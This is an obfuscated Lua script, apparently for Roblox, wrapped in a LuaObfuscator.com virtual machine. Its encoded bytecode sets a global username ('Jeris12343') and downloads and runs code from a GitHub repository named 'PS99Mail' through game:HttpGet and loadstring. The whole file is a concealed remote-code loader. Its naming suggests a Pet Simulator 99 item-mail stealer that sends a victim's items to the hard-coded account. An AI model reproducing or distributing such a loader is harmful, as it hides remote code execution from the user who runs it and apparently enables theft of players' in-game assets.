--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v82=0 -0 ;local v83;while true do if (v82==0) then v83=(v31/((5 -3)^(v32-((878 -(282 + 595)) -0))))%((4 -2)^(((v33-1) -(v32-(620 -(555 + 64)))) + ((2569 -(1523 + 114)) -(857 + 67 + 7)))) ;return v83-(v83%(569 -(367 + 201))) ;end end else local v84=2^(v32-(928 -((304 -90) + 713))) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0 + 0 ;local v35;local v36;local v37;local v38;while true do if (v34==((1415 -(87 + 263)) -(68 + 997))) then v35,v36,v37,v38=v1(v16,v19,v19 + (1273 -(226 + 1044)) );v19=v19 + (17 -(193 -(67 + 113))) ;v34=118 -(32 + 85) ;end if (v34==(1 -0)) then return (v38 * (12302277 + 4474939)) + (v37 * (160901 -95365)) + (v36 * (185 + 66 + 5)) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0 -0 ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39~=(1668 -(970 + 695))) then else v46=nil;while true do local v91=0 -0 ;while true do if (v91~=(1414 -(447 + 966))) then else if (v40==3) then for v105=2 -1 ,v24() do v42[v105-1 ]=v29();end return v44;end if (v40==(6 -4)) then local v102=0 -0 ;while true do if (v102==(1817 -(1703 + 114))) then for v144=1,v45 do local v145=701 -(376 + 325) ;local v146;local v147;while true do if (v145~=(0 -0)) then else v146=v22();v147=nil;v145=2 -1 ;end if (v145~=(1 + 0)) then else if (v146==(242 -(187 + 54))) then v147=v22()~=0 ;elseif (v146==(782 -(162 + 618))) then v147=v25();elseif (v146==(6 -3)) then v147=v26();end v46[v144]=v147;break;end end end v44[17 -(9 + 5) ]=v22();v102=377 -(85 + 291) ;end if (v102==1) then for v148=1 + 0 ,v24() do local v149=0;local v150;local v151;local v152;while true do if (v149==1) then v152=nil;while true do if (v150==(1265 -(243 + 1022))) then local v179=0 -0 ;while true do if (v179~=(1 -0)) then else v150=3 -2 ;break;end if (v179~=(0 + 0)) then else v151=0;v152=nil;v179=1637 -(1373 + 263) ;end end end if (v150==1) then while true do if (0==v151) then v152=v22();if (v21(v152,1181 -(1123 + 57) ,1)==0) then local v180=0 + 0 ;local v181;local v182;local v183;local v184;while true do if (1~=v180) then else v183=nil;v184=nil;v180=2;end if (v180~=(1000 -(451 + 549))) then else v181=254 -(163 + 91) ;v182=nil;v180=1931 -(1869 + 61) ;end if ((1 + 1)==v180) then while true do if (v181==(6 -4)) then local v185=0 -0 ;while true do if ((1 + 0)==v185) then v181=3 -0 ;break;end if (v185==(0 -0)) then if (v21(v183,1 + 0 ,1475 -(1329 + 145) )==(972 -(140 + 831))) then v184[1852 -(1409 + 441) ]=v46[v184[2 + 0 ]];end if (v21(v183,1 + 1 ,720 -(15 + 703) )~=(1 + 0)) then else v184[5 -2 ]=v46[v184[1470 -(899 + 568) ]];end v185=1;end end end if (v181==(0 + 0)) then local v186=0;local v187;while true do if (v186~=(0 -0)) then else v187=603 -(268 + 335) ;while true do if (v187==(290 -(60 + 230))) then v182=v21(v152,574 -(426 + 146) ,1 + 2 );v183=v21(v152,442 -(262 + 176) ,1727 -(345 + 1376) );v187=689 -(198 + 490) ;end if (v187~=(4 -3)) then else v181=1;break;end end break;end end end if (1~=v181) then else local v188=0;while true do if (v188==0) then v184={v23(),v23(),nil,nil};if (v182==0) then local v196=0 + 0 ;local v197;while true do if (v196==(1024 -(706 + 318))) then v197=1206 -(696 + 510) ;while true do if (v197==(0 -0)) then v184[1265 -(1091 + 171) ]=v23();v184[1255 -(721 + 530) ]=v23();break;end end break;end end elseif (v182==(1272 -(945 + 326))) then v184[7 -4 ]=v24();elseif (v182==(1 + 1)) then v184[703 -(271 + 429) ]=v24() -(2^(15 + 1)) ;elseif (v182~=3) then else local v202=0 -0 ;local v203;local v204;while true do if (v202~=(1500 -(1408 + 92))) then else v203=0 -0 ;v204=nil;v202=1087 -(461 + 625) ;end if (v202~=(1289 -(993 + 295))) then else while true do if (v203==0) then v204=374 -(123 + 251) ;while true do if (v204==(0 -0)) then v184[701 -(208 + 490) ]=v24() -(2^16) ;v184[1 + 3 ]=v23();break;end end break;end end break;end end end v188=1 + 0 ;end if (v188==(837 -(660 + 176))) then v181=1 + 1 ;break;end end end if (v181~=(1 + 2)) then else if (v21(v183,1 + 2 ,205 -(14 + 188) )==1) then v184[679 -(534 + 141) ]=v46[v184[2 + 2 ]];end v41[v148]=v184;break;end end break;end end end break;end end break;end end break;end if (v149==(0 + 0)) then v150=529 -(406 + 123) ;v151=nil;v149=1 + 0 ;end end end v40=1772 -(1749 + 20) ;break;end end end break;end if (v91==(0 -0)) then if (v40==(1 -0)) then local v103=0 -0 ;while true do if (v103~=(1 + 0)) then else v46={};v40=1147 -(466 + 679) ;break;end if ((0 + 0)~=v103) then else local v128=0 -0 ;while true do if (v128==(1 + 0)) then v103=1901 -(106 + 1794) ;break;end if (v128~=(396 -(115 + 281))) then else v44={v41,v42,nil,v43};v45=v24();v128=1 + 0 ;end end end end end if (v40~=0) then else local v104=0;while true do if (v104~=(1 + 0)) then else v43={};v40=2 -1 ;break;end if (0==v104) then v41={};v42={};v104=1;end end end v91=3 -2 ;end end end break;end if (v39~=(868 -(550 + 317))) then else v42=nil;v43=nil;v39=2;end if (v39~=(5 -3)) then else v44=nil;v45=nil;v39=3 -0 ;end if (v39~=(0 -0)) then else v40=0 -0 ;v41=nil;v39=1428 -(41 + 1386) ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=406 -(118 + 287) ;local v50=(v21(v48,(407 -303) -(17 + 86) ,14 + 6 ) * ((415 -(15 + 398))^(70 -38))) + v47 ;local v51=v21(v48,60 -39 ,(1318 -(118 + 1003)) -(122 + 44) );local v52=((v21(v48,19 + 13 )==(1 -(0 -0))) and  -(3 -2)) or (1 + 0) ;if (v51==(0 + 0)) then if (v50==(0 -0)) then return v52 * 0 ;else local v92=65 -(30 + 35) ;while true do if (v92==(0 + (377 -(142 + 235)))) then v51=1258 -(1043 + 214) ;v49=0 -(0 -0) ;break;end end end elseif (v51==(598 + 1449)) then return ((v50==(0 -0)) and (v52 * ((1213 -(71 + 252 + 889))/(0 + 0)))) or (v52 * NaN) ;end return v8(v52,v51-((3729 -(553 + 424)) -(3269 -1540)) ) * (v49 + (v50/((582 -(361 + 219))^(1603 -(1126 + 425))))) ;end v26=nil;function v26(v53)local v54=0 + 0 ;local v55;local v56;while true do if (v54==(0 + 0)) then v55=nil;if  not v53 then local v99=0 + 0 ;while true do if (v99==0) then v53=v24();if (v53==(0 + 0)) then return "";end break;end end end v54=1 + 0 ;end if (v54==(2 -1)) then v55=v3(v16,v19,(v19 + v53) -1 );v19=v19 + v53 ;v54=5 -3 ;end if (v54==(6 -3)) then return v6(v56);end if (v54==(1 + 1)) then v56={};for v93=4 -3 , #v55 do v56[v93]=v2(v1(v3(v55,v93,v93)));end v54=756 -(239 + 514) ;end end end v18=5;end if (v18==2) then function v22()local v57=0 -0 ;local v58;while true do if (v57==((1203 -(373 + 829)) + 0)) then return v58;end if (((2060 -(476 + 255)) -(797 + 532))==v57) then v58=v1(v16,v19,v19);v19=v19 + 1 + 0 ;v57=(1131 -(369 + 761)) + 0 ;end end end v23=nil;function v23()local v59,v60=v1(v16,v19,v19 + 2 + 0 );v19=v19 + 2 ;return (v60 * (464 -208)) + v59 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then local v85=0;while true do if (v85==0) then v20=v0(v3(v61,1,1));return "";end end else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v61,16));if v20 then local v100=0;local v101;while true do if (v100==1) then return v101;end if (v100==0) then v101=v5(v87,v20);v20=nil;v100=1;end end else return v87;end break;end end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v88=0,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + 1 ];else v78[v88]=v75[v88 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81==0) then for v123=v80[2],v80[3] do v78[v123]=nil;end else local v107=0;local v108;local v109;local v110;local v111;while true do if (v107==1) then v73=(v110 + v108) -1 ;v111=0;v107=2;end if (v107==2) then for v156=v108,v73 do local v157=0;while true do if (v157==0) then v111=v111 + 1 ;v78[v156]=v109[v111];break;end end end break;end if (v107==0) then v108=v80[2];v109,v110=v71(v78[v108](v13(v78,v108 + 1 ,v80[3])));v107=1;end end end elseif (v81<=2) then v64[v80[3]]=v78[v80[2]];elseif (v81==3) then v78[v80[2]]();else v78[v80[2]]=v80[3];end elseif (v81<=7) then if (v81<=5) then local v114=v80[2];local v115,v116=v71(v78[v114](v13(v78,v114 + 1 ,v80[3])));v73=(v116 + v114) -1 ;local v117=0;for v125=v114,v73 do local v126=0;while true do if (v126==0) then v117=v117 + 1 ;v78[v125]=v115[v117];break;end end end elseif (v81>6) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end else local v131=0;local v132;local v133;while true do if (v131==1) then v78[v132 + 1 ]=v133;v78[v132]=v133[v80[4]];break;end if (v131==0) then v132=v80[2];v133=v78[v80[3]];v131=1;end end end elseif (v81<=8) then local v118=v80[2];v78[v118]=v78[v118](v13(v78,v118 + 1 ,v73));elseif (v81==9) then v72=v80[3];else v64[v80[3]]=v78[v80[2]];end elseif (v81<=15) then if (v81<=12) then if (v81>11) then v72=v80[3];else local v121=v80[2];v78[v121]=v78[v121](v13(v78,v121 + 1 ,v73));end elseif (v81<=13) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81==14) then v78[v80[2]]=v80[3];elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end elseif (v81<=18) then if (v81<=16) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81==17) then v78[v80[2]]();else local v141=0;local v142;local v143;while true do if (v141==1) then v78[v142 + 1 ]=v143;v78[v142]=v143[v80[4]];break;end if (v141==0) then v142=v80[2];v143=v78[v80[3]];v141=1;end end end elseif (v81<=19) then do return;end elseif (v81>20) then for v154=v80[2],v80[3] do v78[v154]=nil;end else do return;end end v72=v72 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!073O00028O0003083O00557365726E616D65030A3O004A657269733132333433030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O0012043O00016O000100013O0026103O0002000100010004093O00020001001204000100013O00261000010005000100010004093O00050001001204000200033O001202000200023O00120F000200043O00120F000300053O002012000300030006001204000500074O0001000300054O000B00023O00022O00030002000100010004093O001400010004093O000500010004093O001400010004093O000200012O00133O00017O00",v9(),...);
